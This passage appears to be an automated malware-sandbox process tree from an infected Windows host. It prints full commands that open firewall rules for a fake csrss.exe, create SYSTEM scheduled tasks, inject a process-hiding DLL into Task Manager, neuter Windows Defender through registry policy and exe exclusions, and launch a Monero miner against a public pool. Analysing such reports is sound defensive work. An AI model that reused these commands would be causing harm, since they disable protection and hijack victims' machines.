        "C:\Users\Admin\Pictures\A6DKueHXjjxUYRAziL7FqPpC.exe"
        8⤵
        
        PID:1508
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2524
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        9⤵
        
        PID:5344
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        10⤵
        Modifies Windows Firewall
        
        PID:1728
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5920
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4580
        
        C:\Users\Admin\Pictures\m2XuA52sgzrsftqWhQ5bXFma.exe
        
        "C:\Users\Admin\Pictures\m2XuA52sgzrsftqWhQ5bXFma.exe"
        7⤵
        Executes dropped EXE
        
        PID:1844
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3952
        
        C:\Users\Admin\Pictures\m2XuA52sgzrsftqWhQ5bXFma.exe
        
        "C:\Users\Admin\Pictures\m2XuA52sgzrsftqWhQ5bXFma.exe"
        8⤵
        
        PID:5512
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5160
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        9⤵
        
        PID:5672
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        10⤵
        Modifies Windows Firewall
        
        PID:5908
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2476
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        10⤵
        
        PID:3140
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3192
        
        C:\Users\Admin\Pictures\gkSJH90QqERNt5aMa7NSzabo.exe
        
        "C:\Users\Admin\Pictures\gkSJH90QqERNt5aMa7NSzabo.exe"
        7⤵
        Executes dropped EXE
        
        PID:576
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5496
        
        C:\Users\Admin\Pictures\gkSJH90QqERNt5aMa7NSzabo.exe
        
        "C:\Users\Admin\Pictures\gkSJH90QqERNt5aMa7NSzabo.exe"
        8⤵
        
        PID:5316
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5900
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        9⤵
        
        PID:724
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        10⤵
        Modifies Windows Firewall
        
        PID:5428
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5504
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5432
        
        C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe
        9⤵
        
        PID:964
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5804
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        10⤵
        Creates scheduled task(s)
        
        PID:5944
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /delete /tn ScheduledUpdate /f
        10⤵
        
        PID:1748
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4796
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5180
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        10⤵
        
        PID:4808
        
        C:\Users\Admin\Pictures\i6MGymcYksQfAd4CKWJ8PM9d.exe
        
        "C:\Users\Admin\Pictures\i6MGymcYksQfAd4CKWJ8PM9d.exe"
        7⤵
        Executes dropped EXE
        
        PID:4564
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5456
        
        C:\Users\Admin\Pictures\i6MGymcYksQfAd4CKWJ8PM9d.exe
        
        "C:\Users\Admin\Pictures\i6MGymcYksQfAd4CKWJ8PM9d.exe"
        8⤵
        
        PID:5140
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5340
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        9⤵
        
        PID:5744
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        10⤵
        Modifies Windows Firewall
        
        PID:5152
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2696
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1972
        
        C:\Users\Admin\Pictures\EnxMjaGe1nUlFa0LkVF2BNXh.exe
        
        "C:\Users\Admin\Pictures\EnxMjaGe1nUlFa0LkVF2BNXh.exe"
        7⤵
        Modifies firewall policy service
        Executes dropped EXE
        Drops file in System32 directory
        
        PID:3728
        
        C:\Users\Admin\Pictures\ijPv92NuvmTmjpzXwJEip2cb.exe
        
        "C:\Users\Admin\Pictures\ijPv92NuvmTmjpzXwJEip2cb.exe"
        7⤵
        Executes dropped EXE
        
        PID:4700
        
        C:\Users\Admin\AppData\Local\Temp\7zS50CB.tmp\Install.exe
        
        .\Install.exe /tEdidDDf "385118" /S
        8⤵
        Checks BIOS information in registry
        Executes dropped EXE
        Enumerates system info in registry
        
        PID:1812
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        9⤵
        
        PID:1872
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        10⤵
        
        PID:472
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        11⤵
        
        PID:964
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        12⤵
        
        PID:5004
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
        10⤵
        
        PID:1752
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        11⤵
        
        PID:3148
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        12⤵
        
        PID:3432
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
        10⤵
        
        PID:1112
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        11⤵
        
        PID:3504
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        12⤵
        
        PID:2976
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
        10⤵
        
        PID:3424
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        11⤵
        
        PID:1312
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        12⤵
        
        PID:5060
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        10⤵
        
        PID:3864
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        11⤵
        
        PID:868
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        12⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1988
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        13⤵
        
        PID:5328
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        9⤵
        
        PID:2308
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        10⤵
        
        PID:5576
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        11⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5600
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        12⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5856
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 23:52:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS50CB.tmp\Install.exe\" it /DbIdidcewD 385118 /S" /V1 /F
        9⤵
        Drops file in Windows directory
        Creates scheduled task(s)
        
        PID:5040
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
        9⤵
        
        PID:5500
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        10⤵
        
        PID:5128
        
        \??\c:\windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        11⤵
        
        PID:5156
        
        C:\Users\Admin\Pictures\RqgysBkM4Ft0xGnTXKGeuJca.exe
        
        "C:\Users\Admin\Pictures\RqgysBkM4Ft0xGnTXKGeuJca.exe"
        7⤵
        Executes dropped EXE
        
        PID:2660
        
        C:\Users\Admin\AppData\Local\Temp\7zS5203.tmp\Install.exe
        
        .\Install.exe /tEdidDDf "385118" /S
        8⤵
        Checks BIOS information in registry
        Executes dropped EXE
        Enumerates system info in registry
        
        PID:2204
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        9⤵
        
        PID:3872
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        10⤵
        
        PID:3608
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        11⤵
        
        PID:2908
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        12⤵
        
        PID:2900
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
        10⤵
        
        PID:5016
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        11⤵
        
        PID:4500
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        12⤵
        
        PID:4936
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
        10⤵
        
        PID:5008
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        11⤵
        
        PID:3172
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        12⤵
        
        PID:1676
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
        10⤵
        
        PID:2376
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        11⤵
        
        PID:1560
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        12⤵
        
        PID:1792
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        10⤵
        
        PID:4496
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        11⤵
        
        PID:3604
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        12⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2376
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        13⤵
        
        PID:5420
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        9⤵
        
        PID:3492
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        10⤵
        
        PID:5804
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        11⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5828
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        12⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6108
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 23:52:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS5203.tmp\Install.exe\" it /NTzdidTKCG 385118 /S" /V1 /F
        9⤵
        Drops file in Windows directory
        Creates scheduled task(s)
        
        PID:5392
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
        9⤵
        
        PID:5704
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        10⤵
        
        PID:1312
        
        \??\c:\windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        11⤵
        
        PID:5756

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 688 -ip 688
1⤵
PID:3744

C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
1⤵
- Executes dropped EXE
PID:4756
- C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
  2⤵
  - Executes dropped EXE
  PID:2816
- - C:\Windows\Temp\771546.exe
    "C:\Windows\Temp\771546.exe" --list-devices
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:3688

C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
1⤵
- Executes dropped EXE
PID:3956
- C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
  "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
  2⤵
  - Executes dropped EXE
  PID:2704

C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
1⤵
- Executes dropped EXE
PID:1232
- C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  PID:3092
- - C:\Windows\Temp\352215.exe
    "C:\Windows\Temp\352215.exe" --http-port 14343 -o xmr.2miners.com:2222 -u 83dQM82bj4yY83XKGKHnbHTzqgY4FUt2pi1JS15u7rTs8v84mTU5ny5MiRoSeyduBUAQKFZ6MsvbMHYTisNeThDM3BqQ59y --coin XMR -t 1 --no-color -p x
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    PID:4128

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2360

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:988

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:4732

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 4344 -ip 4344
1⤵
PID:2356

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4344 -ip 4344
1⤵
PID:4980

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 3924 -ip 3924
1⤵
PID:488

C:\Users\Admin\AppData\Local\Temp\7zS5203.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zS5203.tmp\Install.exe it /NTzdidTKCG 385118 /S
1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:5180
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  PID:5220
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    PID:5280
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      PID:5308
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:5312
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    PID:2024
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      PID:3140
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:3740
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    PID:2524
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      PID:5024
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:3760
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
    3⤵
    PID:5348
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
